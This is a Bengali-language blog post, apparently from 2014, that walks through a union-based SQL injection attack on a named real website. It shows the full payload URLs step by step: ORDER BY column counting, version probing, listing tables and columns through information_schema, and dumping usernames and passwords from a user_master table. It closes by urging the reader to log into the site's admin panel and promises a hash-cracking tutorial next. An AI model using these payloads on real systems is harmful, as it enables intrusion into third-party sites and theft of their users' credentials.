Tuesday, August 19, 2014
প্রথমে আমরা একটি SQL Injectble Site খুজে বের করি www.google.com theke .
আমি http://www.acls.in/news.php?id=10 এই সাইট টা পেলাম Dork ব্যবহার করে । এখন দেখতে হবে সাইট টা SQL Injectble কিনা । এখন আইডি ভ্যালু এর পরে ( ' ) দিলে যদি কোন এরর অথবা কোন কিছু সাইট থেকে মিস করে যেমন যে কোন একটা ছবি মিস করল সাইট থেকে তাহলে বুজতে হবে সাইট টা SQL Injectble :D
আমি সাইট টি ভুলনারবল কিনা চেক করলাম সেই সাইট এর শেষে ( ' ) দিয়ে ।
command : '
সাইট থেকে এই রকম একটা এরর দিবে
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/aclsiosj/public_html/news.php on line 27
এর মানে সাইট টি শকল ভুলনারবল ।
এছাড়া আর কিছু এরর আস্তে পারে ভয় পাবার কিছু নেই :) ;)
এরর গুলু নিচে মত
Warrning:You have an error in your SQL syntax
Warning: mysql_fetch_array()
Warning: getimagesize()
Warning: session_start()
Warning: mysql_num_rows()
Warning: mysql_query()
Warning: array_merge()
Warning: preg_match()
Warning: ilesize()
Warning: filesize()
এরপর কলাম সংখ্যা বের করতে হবে ।
command : +order+by+1--
+order+by+2--
+order+by+3--
সাইট এর শেষে
+order+by+1--
এভাবে
+order+by+2--
+order+by+3--
+order+by+4--
যতখুন পর্যন্ত কন এরর না দিবে ততখুন পর্যন্ত ১,২,৩,৪,৫,৬,৭,৮,৯ এভাবে করে সামনের দিকে যেতে হবে ।
নিচের মতো
কোন এরর নেই
কোন এরর নেই
কোন এরর নেই
কোন এরর নেই
কোন এরর নেই
কোন এরর নেই
কোন এরর নেই
কোন এরর নেই
এরর ।
তার মানে ৮ টি কলাম আছে ৯ নাম্বার কলাম নেই তাই এরর দিয়েছে +order+by+9-- দেবার পর ।
আমরা কলাম সংখ্যা ৮ বের করলাম :)
এখন ভুলনারবল কলাম বের করতে হবে ।
command:+union+select+1,2,3,.....................--
যে কয়টি কলাম আছে +union+select+ এরপর কলাম সংখ্যা লিখতে হবে ।
+union+select+,1,2,3,4,5,6,7,8--
এভাবে ১-৮ পর্যন্ত দেয়া হইছে কারন কলাম সংখ্যা ৮ ।
দেখা যাবে সাইট এ কিছু নাম্বার আসবে যেই নাম্বার আসবে সেইটা হচ্ছে ভুলনারবল কলাম নাম্বার । আমাদের সাইট এর ভুলনারবল্কলাম নাম্বার ৩ এবং ৪ ।
এরপর ভার্সন বের করতে হবে কারন ভার্সন ৫ এর নিছে হলে এই মেথড কাজ করবে না ।
তাই ভার্সন ৫ কিনা তা দেখতে হবে ।
command: version()
@version
৩ আবন ৪ নাম্বার কলাম ভুলনারবল ছিল তাই আমি ৩ নাম্বারে version() দিলাম
+union+select+1,2,version(),4,5,6,7,8--
এভাবে
5.0.84-percona-highperf-b18-log ভার্সন বের হল ।
ভার্সন ৫ তাই আমরা সামনের দিকে Inject করব। :D
এখন টেবিল এর ডাটা বের করতে হবে :D
command : version() এর যায়গায় group_concat(table_name)
এবং শেষে
+from+ information_schema.tables+where+table_schema=database()--
অ্যাড করতে হবে ।
http://www.acls.in/news.php?id=-10+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+where+table_schema=database()--
সাইট এর টেবিল নাম গুলু আসবে :D
নিচের গুলু টেবিল নাম
doc_profile,email,login_logs,news,sms_contacts,sms_details,sms_quota,user_master
এখানে খুজতে হবে কোন টেবিল এর ভিতর ইউজার পাসওয়ার্ড থাকতে পারে :)
এখানে user_master টেবিলে ইউজার পাসওয়ার্ড থাকতে পারে এই কলাম তারগেত করে সামনের কাজ করতে হবে ।
user_master কে হেক্সে রুপান্তর করতে হবে
user_master এর হেক্স 757365725F6D6173746572
এই দুইটি অনলাইন সাইট থেকে টেক্সট কে হেক্সে রুপান্তর করা যায় :D
এখন কলাম নাম বের করতে হবে ।
command : group_concat(table_name) এর যায়গায় group_concat(column_name)
এবং শেষে
+from+information_schema.columns+where+table_name=0x(টেবিল এর হেক্স)
www.acls.in/news.php?id=-10+union+select+1,2,group_concat(column_name),4,5,6,7,8+from+information_schema.columns+where+table_name=0x757365725F6D6173746572--
কলাম এর ভিতর এই ডাটা গুলু আছে
date,site_code,user_id,password,user_name,email_id,active,last_login,last_ip,access_type,gsm_id,cdma_id,sms_bal
এর ভিতর user_name,password এই দুইটি তে ইউজার এবং পাসওয়ার্ড থাকবে :D
এখন ইউজার পাসওয়ার্ড বের করতে হবে
command : group_concat(column_name) এর column_name এর যায়াগায় ইউজার এবং পাসওয়ার্ড কলামের নাম দিতে হবে
কলাম সংখা গুলুর পর +from+(এখানে অ্যাডমিন টেবিলের নাম)
www.acls.in/news.php?id=10+union+select+1,2,group_concat(user_id,0x3a,password),4,5,6,7,8+from+user_master--
এখানে অ্যাডমিন টেবিল নাম user_master তাই +from+ এর পর user_master দেয়া হয়েছে
:D
:D
ইউজার নাম এবং পাসওয়ার্ড পেয়ে গেছেন ;) :D
এখন অ্যাডমিন প্যানেল এর URL বের করে সাইটে লগিন করবেন ;)
অনেক সাইট এর পাসওয়ার্ড হ্যাঁস আকারে থাকে । হ্যাঁস ক্র্যাক করে পাসওয়ার্ড বের করতে হয় ।
হ্যাঁস নিয়ে পরের টিওটরিয়াল দেয়া হবে :)
হ্যাপি এস কিউ এল ইঞ্জেকশান :D :D :D
